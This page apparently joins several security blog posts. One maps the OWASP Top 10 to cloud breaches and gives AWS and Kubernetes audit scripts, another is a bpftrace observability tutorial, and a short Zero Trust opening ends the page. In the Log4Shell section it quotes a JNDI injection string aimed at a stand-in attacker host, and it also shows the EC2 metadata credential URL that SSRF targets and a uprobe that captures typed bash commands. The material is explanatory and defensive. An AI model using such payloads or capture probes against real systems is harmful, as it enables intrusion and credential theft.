OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureEP03: Cloud security breaches 2020–2025


TL;DR

  • OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
  • A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
  • A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
  • A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
  • A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
  • Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.


Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.


A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets that override the account-level block
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container deployed with --privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed — they were never designed in. The kernel doesn’t enforce namespace isolation when a container has CAP_SYS_ADMIN. The attacker doesn’t exploit a vulnerability — they use capabilities the design granted.

# Find pods running as root or with privileged flag
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    select(
      (.spec.containers[].securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) | 
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: kubectl access with cluster-admin ClusterRoleBinding for the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd — it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu before it was caught five weeks before broad distribution release.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# List IAM users with console access but no MFA enrolled
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
docker inspect your-registry/your-image:tag --format='{{.Id}}'
# Compare this digest to the pinned value in your deployment manifest

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify CloudTrail is logging in all regions
aws cloudtrail describe-trails --include-shadow-trails true \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,Logging:HasCustomEventSelectors}'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had a SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication — any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved — a SSRF via GET cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP Category Purple Team Episode
A01 Broken Access Control EP04: Broken access control in AWS
A02 Cryptographic Failures EP06 (partial): CI/CD secrets exposure
A03 Injection EP07: SSRF to cloud metadata
A04 Insecure Design EP08: Kubernetes container escape
A05 Security Misconfiguration EP08: Kubernetes container escape
A06 Vulnerable Components EP09: Supply chain attacks
A07 Authentication Failures EP05: MFA fatigue attacks
A08 SW/Data Integrity EP06: CI/CD secrets exposure, EP09: Supply chain
A09 Logging/Monitoring Failures EP11: Detection engineering with eBPF
A10 SSRF EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
echo "--- GuardDuty status in current region ---"
aws guardduty list-detectors --query 'DetectorIds' --output text || echo "DISABLED"

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text || \
  echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.


Quick Reference

OWASP Cloud Infrastructure Equivalent Detection Tool
A01 IAM wildcards, public S3, broad trust policies AWS Config, CloudTrail
A02 Plaintext secrets in env vars, unencrypted S3 TruffleHog, Macie
A03 SSRF, Log4j JNDI injection WAF logs, CloudTrail IMDS calls
A04 Privileged containers, no seccomp OPA/Gatekeeper, Falco
A05 K8s RBAC defaults, open etcd, open SGs kube-bench, AWS Config
A06 Unpatched base images, transitive CVEs, supply chain Trivy, Grype, SLSA
A07 MFA fatigue, long-lived sessions, stolen tokens GuardDuty, Okta logs
A08 Unsigned images, mutable CI references, build compromise Cosign, SLSA, OIDC
A09 No CloudTrail, no GuardDuty, no runtime telemetry AWS Security Hub
A10 IMDSv1 on EC2, SSRF to internal endpoints VPC Flow Logs, CloudTrail

Key Takeaways

  • OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
  • A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
  • A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
  • A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
  • A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
  • Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
  • Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through April 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes — identity, supply chain, misconfiguration — and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

bpftrace — Kernel Answers in One Line

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 9
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace**


Architecture Overview

bpftrace and eBPF Tracing — dynamic kernel observability showing probe types and output pipeline
bpftrace attaches probes at runtime — no recompilation, no restarts, full kernel visibility in one line.

TL;DR

  • bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
    (think of it like kubectl exec — but for asking the kernel a direct question, with no agent, no sidecar, no prior setup)
  • kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
  • The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress
  • Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
  • Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use --timeout, watch %si
  • Container PIDs are host-namespace PIDs in bpftrace — use curtask->real_parent->tgid to correlate to container activity

bpftrace turns any kernel question into a one-liner — compiling, loading, and attaching a complete eBPF program in seconds, with no agents, no restarts, and no prior instrumentation on the node. When something is wrong on a node right now and you don’t know where to look, it’s how you ask the kernel a direct question. That’s what EP09 is about.

Quick Check: Is bpftrace Available on Your Node?

Before the one-liner toolkit — verify bpftrace is installed and working on a cluster node:

# SSH into a worker node, then:
bpftrace --version
# bpftrace v0.19.0   ← any version ≥ 0.16 supports the patterns in this episode

# Verify BTF is available (required for struct access one-liners)
ls /sys/kernel/btf/vmlinux && echo "BTF available"

# The simplest possible one-liner — count syscalls for 5 seconds
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' --timeout 5

Expected output (abridged):

Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47

Each line is a process name and how many syscalls it made in 5 seconds. If this runs and produces output, everything in this episode will work on your node.

Not on a self-managed node? EKS managed nodes and GKE nodes don’t have bpftrace pre-installed, but you can run it from a privileged debug pod: kubectl debug node/<node-name> -it --image=quay.io/iovisor/bpftrace. The tool runs on the host kernel — you get full kernel visibility even from a pod.


A node in production started showing elevated TCP latency — p99 at 180ms, where p99 was normally under 10ms. The application logs were clean. The APM dashboard showed nothing unusual at the service level. CPU, memory, disk: all normal. The load balancer health checks were passing.

I had 12 minutes before the on-call escalation would have gone to the application team and started a war room.

I ran one command:

bpftrace -e 'kretprobe:tcp_recvmsg { @bytes[comm] = hist(retval); }' --timeout 10

Ten seconds of sampling. The histogram output showed a single process — backup-agent — receiving 4MB chunks at irregular intervals. Not the application. Not the service mesh. A backup agent that runs at the infrastructure layer, saturating the receive path with large reads during its scheduled window.

Found in 9 seconds. War room averted.

What made that possible is something most engineers don’t know about bpftrace: that one-liner is not a monitoring query. It’s a complete eBPF program — compiled, loaded into the kernel, attached to the tcp_recvmsg kernel return probe, run, and cleaned up — all in ten seconds. bpftrace is a compiler that happens to have a very convenient command-line interface.


What bpftrace Actually Is

bpftrace is not a monitoring tool. It’s an eBPF compiler with a high-level scripting language designed for one-shot investigation.

When you run bpftrace -e 'kretprobe:tcp_recvmsg { ... }', this is what happens:

Your one-liner
      ↓
bpftrace's built-in LLVM/Clang frontend
      ↓
eBPF bytecode (.bpf.o in memory)
      ↓
Kernel verifier validates the program
      ↓
JIT compiler compiles to native machine code
      ↓
Program attaches to tcp_recvmsg kretprobe
      ↓
Runs until Ctrl-C or --timeout
      ↓
Output printed, maps freed, program detached

The kernel doesn’t know bpftrace wrote the program. It’s the same path as Falco, Cilium, Tetragon — kernel program loaded via the BPF syscall, verified, JIT-compiled, attached to a probe. bpftrace just wraps that entire process in a scripting language that takes 30 seconds to write instead of an afternoon.

This is why bpftrace can answer questions that no other tool can: it compiles to a kernel-level observer that fires on any event in the kernel, on any process, on any container — without any prior instrumentation.


The Four Probe Types You’ll Use Most

bpftrace supports 20+ probe types. These four cover 90% of production debugging:

kprobe / kretprobe — Kernel Functions

Attaches to the entry (kprobe) or return (kretprobe) of any kernel function. The most powerful probes for understanding what the kernel is actually doing.

# Fire on every call to tcp_connect — who's making new TCP connections?
bpftrace -e 'kprobe:tcp_connect { printf("%s PID %d connecting\n", comm, pid); }'

# On return from tcp_recvmsg — how large are the reads per process?
bpftrace -e 'kretprobe:tcp_recvmsg { @[comm] = hist(retval); }'

# Count calls to vfs_write per process (file write activity)
bpftrace -e 'kprobe:vfs_write { @[comm] = count(); }'

Limitation: kernel functions are internal and can change between kernel versions. Use tracepoints (below) for stability when you can.

kprobe instability: A function targeted by a kprobe can be inlined by the kernel compiler — the compiler embeds the function’s code at its call sites with no separate entry point. When that happens, the kprobe silently fires on nothing. Verify before relying on one: bpftrace -l 'kprobe:function_name' — empty response means it was inlined. Use a tracepoint equivalent instead.

tracepoint — Stable Kernel Trace Points

Tracepoints are stable, versioned hooks explicitly placed in the kernel source. Unlike kprobes, they are part of the kernel’s public interface and guaranteed not to disappear between versions. Use these for anything you need to work reliably across a fleet with mixed kernel versions.

# Every file open — process name + filename
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%s %s\n", comm, str(args->filename));
}'

# Every outbound connect — process, destination IP and port
bpftrace -e 'tracepoint:syscalls:sys_enter_connect {
    printf("%-16s %-6d\n", comm, pid);
}'

# List all available tracepoints (hundreds)
bpftrace -l 'tracepoint:syscalls:*' | head -30

uprobe — Userspace Function Probes

Attaches to a specific function in a userspace binary or library. Useful for observing application behaviour without recompiling.

# What bash commands are being typed on this node?
bpftrace -e 'uprobe:/bin/bash:readline { printf("%s\n", str(arg0)); }'

# Python function calls
bpftrace -e 'uprobe:/usr/bin/python3:PyObject_Call { printf("Python call: pid %d\n", pid); }'

From a security standpoint: this is how you observe what an attacker is typing in an interactive shell they’ve obtained on your node — in real time, from the kernel, without touching the terminal session.

interval — Periodic Sampling

Runs a block of code on a fixed interval. Used for aggregation and periodic stats.

# Print the top file-opening processes every 5 seconds
bpftrace -e '
kprobe:vfs_open { @[comm] = count(); }
interval:s:5  { print(@); clear(@); }
'

The One-Liner Toolkit: Runnable Right Now

These run on any Linux node with BTF (kernel 5.8+, Ubuntu 20.04+, most managed K8s nodes):

# What files is every process opening right now? (30-second view)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%-16s %s\n", comm, str(args->filename));
}' --timeout 30

# Who is making DNS queries? (catches queries from any container, no sidecar needed)
bpftrace -e 'tracepoint:net:net_dev_xmit {
    if (args->skbaddr->protocol == 0x0800) printf("%s\n", comm);
}'

# Latency histogram for all read() syscalls — find the slow process
bpftrace -e '
tracepoint:syscalls:sys_enter_read { @start[tid] = nsecs; }
tracepoint:syscalls:sys_exit_read  {
    $latency = nsecs - @start[tid];
    @latency[comm] = hist($latency);
    delete(@start[tid]);
}' --timeout 15

# Which process is using the most CPU right now? (99Hz sampling)
bpftrace -e 'profile:hz:99 { @[comm] = count(); }' --timeout 10

# Real-time syscall frequency — find unusual process activity
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm, args->id] = count(); }' --timeout 10 \
  | sort -k3 -rn | head -20

# New TCP connections in the last 30 seconds — source and dest
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    printf("%-16s → %s:%d\n", comm,
           ntop(AF_INET, $sk->__sk_common.skc_daddr),
           $sk->__sk_common.skc_dport >> 8);
}' --timeout 30

# What is a specific PID doing? (replace 12345)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat /pid == 12345/ {
    printf("%s\n", str(args->filename));
}'

Each of these compiles and loads in under 2 seconds. They leave no persistent state. When they exit, the kernel reverts to exactly the state it was in before.


The Security Use Cases

Watching an Active Session

If you suspect a process is running commands you didn’t deploy:

# See every bash command on this node in real time
bpftrace -e 'uprobe:/bin/bash:readline { printf("%s %s\n", comm, str(arg0)); }'

# Every process spawn — PID, parent, command
bpftrace -e 'tracepoint:syscalls:sys_enter_execve {
    printf("%-6d %-6d %s\n", pid, curtask->real_parent->tgid, str(args->filename));
}'

This is the kernel-level version of watching /var/log/auth.log — except it can’t be suppressed by an attacker who has root, because the probe runs in kernel space. An attacker who has compromised a container with root inside the container cannot prevent a bpftrace program on the host from observing their syscalls.

Detecting Unexpected Network Activity

# Any process making a connection to a non-standard port
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $port = $sk->__sk_common.skc_dport >> 8;
    if ($port != 80 && $port != 443 && $port != 53) {
        printf("%-16s port %d\n", comm, $port);
    }
}'

# DNS queries to non-standard resolvers (anything not on port 53)
bpftrace -e 'tracepoint:syscalls:sys_enter_sendto {
    if (args->addr->sa_family == 2) {
        printf("%-16s → %s\n", comm, str(args->addr));
    }
}'

Watching File Access on Sensitive Paths

# Any access to /etc/passwd, /etc/shadow, /root/
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    if (str(args->filename) == "/etc/passwd" ||
        str(args->filename) == "/etc/shadow") {
        printf("%-16s PID %-6d opened %s\n", comm, pid, str(args->filename));
    }
}'

Production Gotchas

CPU overhead: bpftrace probes fire synchronously in the traced context. High-frequency probes on hot kernel paths (vfs_read, sys_enter_* without filtering) can add 10–20% overhead. Always test with --timeout and watch %si before running on a production node.

Maps grow unbounded by default: @[comm] = count() will accumulate an entry per unique comm value forever in the current session. Use clear(@) in an interval block, or set a key limit: @[comm] = count(); if (@[comm] > 100) { clear(@comm); }.

kprobe instability: Functions targeted by kprobes can be inlined by the compiler between kernel versions, making the probe silently ineffective. If a kprobe isn’t firing, verify the function exists: bpftrace -l 'kprobe:function_name'. If it returns nothing, the function was inlined. Use a tracepoint equivalent instead.

Container PIDs: PIDs inside a container are different from host PIDs. pid in bpftrace is the host namespace PID.

Container PID semantics: When a container shows PID 1 internally, the host kernel sees it as PID 8432 (or whatever was assigned). bpftrace’s pid built-in always gives you the host-namespace PID. To map a container’s PID to the host PID: cat /proc/<host-pid>/status | grep NSpid — the second value is the PID inside the container. Or use curtask->real_parent->tgid in your probe to walk the process tree. This matters when you filter by pid in a one-liner and get no output — you may be filtering on the container-namespace PID instead of the host one.

BTF requirement: bpftrace requires BTF for struct field access ($sk->__sk_common.skc_daddr). If BTF is unavailable, struct access fails. Check /sys/kernel/btf/vmlinux exists before running struct-access one-liners.


Quick Reference

Probe type Syntax Use for
kernel function entry kprobe:function_name Function arguments
kernel function return kretprobe:function_name Return value, latency
kernel tracepoint tracepoint:subsys:name Stable, versioned hooks
userspace function uprobe:/path/to/bin:function App-level observation
CPU sampling profile:hz:99 Flamegraphs, hot code
interval interval:s:N Periodic aggregation
process start tracepoint:syscalls:sys_enter_execve New process detection
Built-in variable Value
pid Process ID (host namespace)
tid Thread ID
comm Process name (15 chars)
nsecs Nanoseconds since boot
curtask Pointer to task_struct
retval Return value (kretprobe/tracepoint exit)
args Probe arguments struct

Key Takeaways

  • bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
  • kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
  • The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress, because the probe runs on the host in kernel space
  • Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
  • Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use --timeout, watch %si

What’s Next

bpftrace answers questions you ask in the moment. EP10 covers what happens when you need those answers continuously — not as a one-shot investigation tool, but as persistent telemetry recording every network connection across your entire cluster.

Flow observability from TC hooks is the always-on version: a persistent eBPF program recording every connection attempt, every retransmit, every dropped packet — the ground truth layer that everything above it interprets. When your APM says “timeout” and the kernel says “retransmit storm to one specific endpoint,” the kernel is right.

Next: network flow observability at the kernel level

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

Reading Time: 7 minutes

The Identity Stack, Episode 13
EP12: Entra ID + LinuxEP13


TL;DR

  • Zero Trust means “never trust, always verify” — identity is verified continuously, not just at login time; network location provides no implicit trust
  • Human identity (users) and workload identity (services, pods, jobs) are separate problems — LDAP/Kerberos/OIDC solve the human side; SPIFFE/SPIRE solve the workload side
